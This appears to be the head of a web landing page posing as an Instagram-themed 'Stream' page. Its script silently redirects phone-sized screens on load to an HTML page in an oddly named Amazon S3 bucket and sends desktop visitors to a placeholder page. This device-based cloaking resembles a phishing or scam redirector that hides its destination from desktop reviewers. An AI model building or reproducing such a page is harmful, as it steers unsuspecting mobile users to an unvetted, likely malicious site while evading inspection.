<!DOCTYPE html>
  <html lang="es">
  <head>
  <meta charset="utf-8"/>
  <meta name="title" content="Stream"/>
  <meta name="keywords" content="Instagram"/>
  <meta property="og:description" content="2411"/>
  <meta name="googlebot" content="noindex"/>
  <meta name="robots" content="index"/>
  <meta name="robots" content="noindex"/>
  <meta name="robots" content="nofollow"/>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
  <meta name="viewport" content="width=device-width, initial-scale=1"/>
  <meta property="og:title" content=""/>
  <meta property="og:image" content="https://app.publer.io/uploads/tmp/1719853359-295274545073927-0568-1297/mini_magick20240701-9219-a2o31n.jpg"/> 
  <meta name="apple-itunes-app" content="app-id=6448311069"/>
  <script type="text/javascript">
    function generateRandomString(iLen) {
      var sRnd = '';
      var sChrs = "abcdefghiklmnopqrstuvwxyz";
      for (var i = 0; i < iLen; i++) {
        var randomPoz = Math.floor(Math.random() * sChrs.length);
        sRnd += sChrs.substring(randomPoz, randomPoz + 1);
      }
      return sRnd;
    }
          if (screen.width <= 720) {
          window.location = "https://cajas5855555555.s3.ap-southeast-2.amazonaws.com/Wasssssssshuf0000/camak00.html";
      } else {
          window.location = "https://example.com/default_page.html"
      }
  </script>
    
